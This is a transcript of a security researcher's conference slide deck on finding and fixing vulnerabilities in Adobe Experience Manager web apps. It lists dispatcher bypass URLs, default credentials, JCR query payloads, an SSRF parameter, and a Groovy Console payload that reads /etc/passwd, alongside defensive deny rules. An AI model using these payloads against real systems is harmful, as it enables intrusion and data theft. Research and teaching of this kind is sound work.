Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Securing AEM webapps by hacking them

Mikhail Egorov
September 03, 2019

Securing AEM webapps by hacking them

Mikhail Egorov

September 03, 2019
Tweet

More Decks by Mikhail Egorov

Other Decks in Programming

Transcript

  1. APACHE SLING & FRIENDS TECH MEETUP
    2 - 4 SEPTEMBER 2019
    Securing AEM webapps by hacking them
    Mikhail Egorov @0ang3el, Security researcher & Bug hunter.

    View full-size slide

  2. whoami
    3
     Security researcher & full-time bug hunter
     https://bugcrowd.com/0ang3el
     https://hackerone.com/0ang3el
     Conference speaker
     https://www.slideshare.net/0ang3el
     https://speakerdeck.com/0ang3el

    View full-size slide

  3. AEM & Bug Bounties
    4

    View full-size slide

  4. My research on AEM security
    5
    PHDays 2015
    Hacktivity 2018
    LevelUp 2019
    https://www.slideshare.net/0ang3el

    View full-size slide

  5. Fellow hackers
    6
    @darkarnium, 2016
    @fransrosen, 2018
    @JonathanBoumanium, 2018
    https://medium.com/@jonathanbouman/reflected-xss-at-philips-com-e48bf8f9cd3c
    https://speakerdeck.com/fransrosen/a-story-of-the-passive-aggressive-sysadmin-of-aem
    http://www.kernelpicnic.net/2016/07/24/Microsoft-signout.live.com-Remote-Code-Execution-Write-Up.html

    View full-size slide

  6. Common AEM deployment
    7
    Interacts with Publish server
    via AEM Dispatcher!
    4503/tcp
    4502/tcp
    443/tcp
    ?
    Main blocks:
    • Author AEM instance
    • Publish AEM instance
    • AEM dispatcher (~WAF)

    View full-size slide

  7. Sources of vulnerabilities
    8
     AEM misconfiguration
     AEM code (CVEs)
     3rd-party plugins
     Your code

    View full-size slide

  8. 9
    Vulnerabilities due to misconfiguration

    View full-size slide

  9. AEM dispatcher bypass – CVE-2016-0957
    10
     Blocked by Dispatcher
     /bin/querybuilder.json
     However passed to publish instance
     /bin/querybuilder.json/a.css
     /bin/querybuilder.json/a.icoS
     /bin/querybuilder.json?a.html
     /bin/querybuilder.json;%0aa.css

    View full-size slide

  10. AEM dispatcher bypass – Sling “features”
    11
     When Sling Servlet is registered with
    sling.servlet.path other properties are
    ignored (e.g. sling.servlet.extensions)
     Bypassing extension check
     /bin/querybuilder.json.css
     /bin/querybuilder.feed.ico

    View full-size slide

  11. AEM dispatcher bypass – Sling “features”
    12
     When Sling Servlet is registered with
    sling.servlet.resourceTypes
     Bypassing path check
     Create node with proper sling:resourceType under
    /content/usergenerated/etc/commerce/smartlists

    View full-size slide

  12. AEM dispatcher security tips
    13
     Don’t use rules like
     /0041 { /type "allow" /url "*.css" } # This is bad
     Better use
     /0041 { /type "allow" /extension 'css' }

    View full-size slide

  13. AEM dispatcher security tips
    14
     Explicit deny rule for dangerous endpoints
     /0090 { /type "deny" /path "/libs/*" }
     /0091 { /type "deny" /path "/bin/querybuilder*" }
     Place explicit deny rules in the end of policy

    View full-size slide

  14. Default credentials
    15
     admin/admin
     author/author
     Geometrixx users
     grios:password
    [email protected]:jdoe
     …

    View full-size slide

  15. Default credentials
    16
    == base64(admin:admin)

    View full-size slide

  16. Weak passwords / Credentials bruterorcing
    17
     Properties jcr:createdBy, cq:lastModifiedBy,
    jcr:lastModifiedBy contain usernames
     Many ways to bruteforce
     LoginStatusServlet
     GetLoggedInUser servlet
     CurrentUserServlet
     …

    View full-size slide

  17. Weak permissions for JCR
    18
     Many ways to access JCR
     DefaultGetServlet
     QueryBuilderJsonServlet
     QueryBuilderFeedServlet
     GQLSearchServlet
     CRXDE Lite
     …

    View full-size slide

  18. Weak permissions for JCR
    19
     Anonymous user has jcr:write permission
    for /content/usergenerated/etc/commerce/s
    martlists

    View full-size slide

  19. 0
    /apps//config.author.tidy.1..json/a.ico

    View full-size slide

  20. Weak permissions for JCR
    21
    type=nt:file&nodename=*.zip

    View full-size slide

  21. Weak permissions for JCR
    22
    path=/home&p.hits=full&p.limit=-1

    View full-size slide

  22. 23
    Vulnerabilities due to 3-rd party components

    View full-size slide

  23. Groovy Console
    24
     Exposes servlet at
    /bin/groovyconsole/post.servlet without
    authentication
    by default
    https://github.com/icfnext/aem-groovy-console

    View full-size slide

  24. cS4VLFuCHKwX;XS
    script=def+proc+%3d+”cat+/etc/passwd”.execute()%0d%0aprintln+proc.text

    View full-size slide

  25. ACS AEM Tools
    26
     Exposes Fiddle with ability to execute JSP
    scripts on /etc/acs-tools/aem-
    fiddle/_jcr_content.run.html
     May not require authentication

    View full-size slide

  26. cS4VLFuCHKwX;X

    View full-size slide

  27. 28
    AEM vulnerabilities

    View full-size slide

  28. CVE-2018-12809 (SSRF*)
    29
     ReportingServicesProxyServlet (cq-content-insight bundle)
    @SlingServlet(
    generateComponent = true,
    metatype = true,
    resourceTypes = {"cq/contentinsight/proxy"},
    extensions = {"json"},
    selectors = {"reportingservices"},
    methods = {"GET"},
    label = "Reporting Services API proxy servlet",
    description = "Proxy servlet for Reporting Services API"
    )
    public class ReportingServicesProxyServlet extends SlingSafeMethodsServlet {
    private static final String DEFAULT_API_OMNITURE_URL = ".*/api[0-9]*.omniture.com/.*";}

    } *SSRF - Server Side Request Forgery

    View full-size slide

  29. CVE-2018-12809 (SSRF*)
    30
     Paths to invoke servlet
     /libs/cq/contentinsight/content/proxy.reportingservices.json
     /libs/cq/contentinsight/proxy/reportingservices.json.GET.servlet
     Vulnerable parameter url
     url=http://anyurl%23/api1.omniture.com/a
    *SSRF - Server Side Request Forgery

    View full-size slide

  30. ExternalJobPostServlet deser / CVE?
    34
     Affects AEM 5.5 / AEM 5.6
    @Service
    @Properties(value = {
    @Property(name = "sling.servlet.extensions", value = "json"),
    @Property(name = "sling.servlet.paths", value =
    "/libs/dam/cloud/proxy"),
    @Property(name = "sling.servlet.methods", value = { "POST", "GET",
    "HEAD" })
    })
    public class ExternalJobPostServlet extends SlingAllMethodsServlet {
    ...
    }

    View full-size slide

  31. ExternalJobPostServlet deser / CVE?
    35
     Parameter file accepts Java serialized stream
    and passes to OIS.readObject()
     Hard to exploit in OSGI environment

    View full-size slide

  32. 38
    Automation

    View full-size slide

  33. AEM RCE bundle
    39
     Allows to get RCE* when having access to
    Felix Console
     https://github.com/0ang3el/aem-rce-bundle.git
    * RCE – Remote Code Execution

    View full-size slide

  34. AEM RCE bundle
    40
     Path - /bin/backdoor.html?cmd=ifconfig

    View full-size slide

  35. AEM Hacker
    41
     Scripts to check security of AEM application
     aem_hacker.py, aem_discoverer.py, aem_enum.py,
    aem_ssrf2rce.py, aem_server.py, response.bin,
    aem-rce-sling-script.sh
     https://github.com/0ang3el/aem-hacker.git

    View full-size slide

  36. Takeaways
    44
     Vulnerabilities can occur on different levels
     Install security updates
     Defense in depth
     Check security of AEM application
     Pentest / Bug bounty

    View full-size slide

  37. 45
    Thank you
    @0ang3el

    View full-size slide